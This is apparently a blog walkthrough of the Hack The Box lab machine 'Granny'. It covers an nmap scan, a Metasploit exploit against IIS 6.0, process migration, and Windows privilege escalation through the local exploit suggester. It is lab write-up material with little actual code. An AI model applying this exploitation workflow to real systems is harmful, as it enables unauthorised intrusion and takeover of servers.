🔐
EAkl Blog
  • 👋Welcome!
  • 🐛Web Application Findings
    • Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    • Authentication bypass using empty parameters.
    • IDOR at Login function leads to leak user’s PII data
  • ℹ️Recon automation, tips and tricks
    • Simple Recon Methodology
    • How to write a simple script to automate finding bugs
  • 🔐Hack The Box Machines
    • Feline Walkthrough
    • Reel2 Walkthrough
    • Active Walkthrough
    • PopCorn Walkthrough
    • Jewel Walkthrough
    • Passage Walkthrough
    • Time Walkthrough
    • Devel Walkthrough
    • Lame Walkthrough
    • Beep Walkthrough
    • Blue Walkthrough
    • Jerry Walkthrough
    • Optimum Walkthrough
    • Grandpa Walkthrough
    • Legacy Walkthrough
    • Mirai Walkthrough
    • Valentine Walkthrough
    • Shocker Walkthrough
    • Netmon Walkthrough
    • Bank Walkthrough
    • Granny Walkthrough
    • Tabby Walkthrough
    • Access Walkthrough
    • Swagshop Walkthrough
    • OpenAdmin Walkthrough
    • Remote Walkthrough
    • Sauna Walkthrough
    • FriendZone Walkthrough
    • Hack The Box — Networked
    • Hack The Box — Forest
    • Hack The Box — WriteUP
    • Hack The Box — Academy
    • Hack The Box — Luanne
  • 🏴‍☠️CTF Challenges
    • CTF CyberTalents  — Bypass the world Writeup
    • CTF CyberTalents — Admin Gate First
    • CTF CyberTalents — Inbox
    • CTFlearn — Inj3ction Time
    • CTF ringzer0ctf — Challenge Access List
    • CTF ringzer0ctf — Login portal 2
    • CTF ringzer0ctf — SQLi challenges — part 1
    • CTF ringZer0ctf — Login form
  • 🔴Red Teaming Tips & Tricks
    • MOTW Defensive and Bypass techniques
  • ☁️Cloud Security
    • [Azure] Real Example to know different types of app concepts in Azure
    • [Azure] What To Do If?
Powered by GitBook
On this page
  1. Hack The Box Machines

Granny Walkthrough

PreviousBank WalkthroughNextTabby Walkthrough

Last updated 2 years ago

Hey folks, we are back again with one of Hack The Box machines “Granny” which it depends on custom exploitation and Windows privileges escalation, but before we get started let’s take a look at its info

That’s good, it’s easy, but you will learn new things about Win Priv Escalation, let’s get started…

Nmap scan

In this step we will discover all open ports, service running, OS detect results and more nmap -A -T4 -oG granny.gnmap <machine-ip>

We have only port 80 open and have service running on it Microsoft IIS 6.0 and nothing else.

Let’s try to discover machine webpage by searching for 10.10.10.15:80 and you will get nothing useful, so let’s discover the hidden directories by using dirbuster/dirsearch/ffuf/gobuster or any tool you want

We have more directories, but there’s no useful information in all of them, so let’s take the next step

Let’s try to search for exploitation of the service running at google or searchsploit tool

The good news, we have the same exploitation at metasploit and exploit-db

Let’s search for it on metasploit and then use is

After editing all of these options, type run to get meterpreter session

Good, we have a session now, let’s type shell to open a reverse shell and know who we are and what privileges we have

Unfortunately, we have user access or privileges only, so let’s search for user.txt and then try to get root access

Let’s go to the Documents and Settingsdirectory and try to get access to user directory

We can’t open any directory !!

Okay, let's try to get root access

Put this session in the background by typing background and you will get <session-id> and then search for suggester module for discovering all vulnerabilities which our vulnerable machine is affected by

Just put the session number into it as you can see and run

Nice, we have a bunch of vulnerabilities, and you should try every one of them. For me, I’ll try to get the last one first

Good, It’s for privilege escalation, let's try it

Unfortunately, our vulnerable machine refuses the module execution so let’s go into it and see what the service prevents the module from execution

  • session -i <session-id> → to return to exist open session

  • ps → to see services running

Note WmiPrvse.exe this service prevents any external module from execution, let’s migrate it by typing migrate <process-id>

Okay, let’s return to our module and try to run it again

Okay, just change the lport to anything other than the lport which the first session run on it.

As you can see we’re admin now, it’s easy now to grab the user and the root flag

🔐